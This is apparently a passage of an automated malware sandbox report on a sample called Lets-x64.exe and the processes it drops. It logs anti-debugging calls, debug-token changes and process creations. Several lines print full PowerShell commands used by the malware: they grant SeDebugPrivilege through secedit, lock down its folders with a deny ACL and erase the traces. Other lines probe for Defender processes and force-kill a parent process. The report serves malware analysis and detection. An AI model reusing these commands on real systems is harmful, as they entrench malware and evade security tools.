                              Source: irsetup.exe, 00000002.00000002.4576101821.0000000006185000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000002.4576101821.0000000006150000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000021.00000002.4025460149.000001F07F454000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                              Source: C:\Users\user\Desktop\Lets-x64.exeAPI call chain: ExitProcess graph end nodegraph_0-3250
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeAPI call chain: ExitProcess graph end nodegraph_2-24791
                              Source: C:\ProgramData\Program\iusb3mon.exeAPI call chain: ExitProcess graph end nodegraph_28-35261
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                              Source: C:\Users\user\Desktop\Lets-x64.exeCode function: 0_2_00007FF668853240 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF668853240
                              Source: C:\Users\user\Desktop\Lets-x64.exeCode function: 0_2_00007FF668851908 LoadLibraryA,GetProcAddress,FreeLibrary,0_2_00007FF668851908
                              Source: C:\ProgramData\Program\iusb3mon.exeCode function: 28_2_001DDB1C mov ecx, dword ptr fs:[00000030h]28_2_001DDB1C
                              Source: C:\ProgramData\Program\iusb3mon.exeCode function: 28_2_001E817A mov eax, dword ptr fs:[00000030h]28_2_001E817A
                              Source: C:\ProgramData\Program\iusb3mon.exeCode function: 28_2_04D100CD mov eax, dword ptr fs:[00000030h]28_2_04D100CD
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeCode function: 2_2_000000018003A8E4 GetProcessHeap,HeapAlloc,_errno,_errno,__doserrno,_errno,GetProcessHeap,HeapFree,SetEndOfFile,_errno,__doserrno,GetLastError,2_2_000000018003A8E4
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                              Source: C:\Users\user\Desktop\Lets-x64.exeCode function: 0_2_00007FF6688542FC SetUnhandledExceptionFilter,0_2_00007FF6688542FC
                              Source: C:\Users\user\Desktop\Lets-x64.exeCode function: 0_2_00007FF668853240 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF668853240
                              Source: C:\Users\user\Desktop\Lets-x64.exeCode function: 0_2_00007FF668852680 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF668852680
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeCode function: 2_2_000000018001E0D0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_000000018001E0D0
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeCode function: 2_2_000000018002BB84 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_000000018002BB84
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeCode function: 2_2_000000018003A484 RtlCaptureContext,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_000000018003A484
                              Source: C:\ProgramData\Program\iusb3mon.exeCode function: 28_2_001DA8ED IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,28_2_001DA8ED
                              Source: C:\ProgramData\Program\iusb3mon.exeCode function: 28_2_001D6340 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,28_2_001D6340
                              Source: C:\ProgramData\Program\iusb3mon.exeCode function: 28_2_0624D0B0 SetUnhandledExceptionFilter,28_2_0624D0B0
                              Source: C:\ProgramData\Program\iusb3mon.exeCode function: 28_2_0624D0C2 SetUnhandledExceptionFilter,28_2_0624D0C2

                              HIPS / PFW / Operating System Protection Evasion

                              barindex
                              Encrypted powershell cmdline option found
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.*')) -Force;"
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Data\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.*')) -Force;"
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.*')) -Force;"
                              Source: C:\ProgramData\Program\iusb3mon.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.*')) -Force;"
                              Source: C:\ProgramData\Program\iusb3mon.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Data\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.*')) -Force;"
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Data\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.*')) -Force;"Jump to behavior
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.*')) -Force;"
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Data\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.*')) -Force;"
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.*')) -Force;"
                              Source: C:\ProgramData\Program\iusb3mon.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.*')) -Force;"
                              Source: C:\ProgramData\Program\iusb3mon.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Data\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.*')) -Force;"
                              Source: C:\ProgramData\Program\iusb3mon.exeCode function: CreateToolhelp32Snapshot,Process32First,OpenProcess,TerminateProcess,Process32Next,CloseHandle, explorer.exe28_2_06243C8E
                              Source: C:\ProgramData\Program\iusb3mon.exeCode function: 28_2_06244652 GetModuleFileNameA,ShellExecuteExA,ExitProcess,28_2_06244652
                              Source: C:\Users\user\Desktop\Lets-x64.exeProcess created: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe "C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe" __IRAOFF:5664114 "__IRAFN:C:\Users\user\Desktop\Lets-x64.exe" "__IRCT:0" "__IRTSS:0" "__IRSID:S-1-5-21-2246122658-3693405117-2476756634-1003"Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"msmpeng.exe\"));Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"securityhealthsystray.exe\"));Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"mpcopyaccelerator.exe\"));Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"msmpeng.exe\"));Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $mypid=(Get-WmiObject -Query 'select ParentProcessId from Win32_Process where ProcessId=320').ParentProcessId;if($mypid){Stop-Process -Id $mypid -Force;}Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start "title" "C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe"Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Data\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.*')) -Force;"Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));Jump to behavior
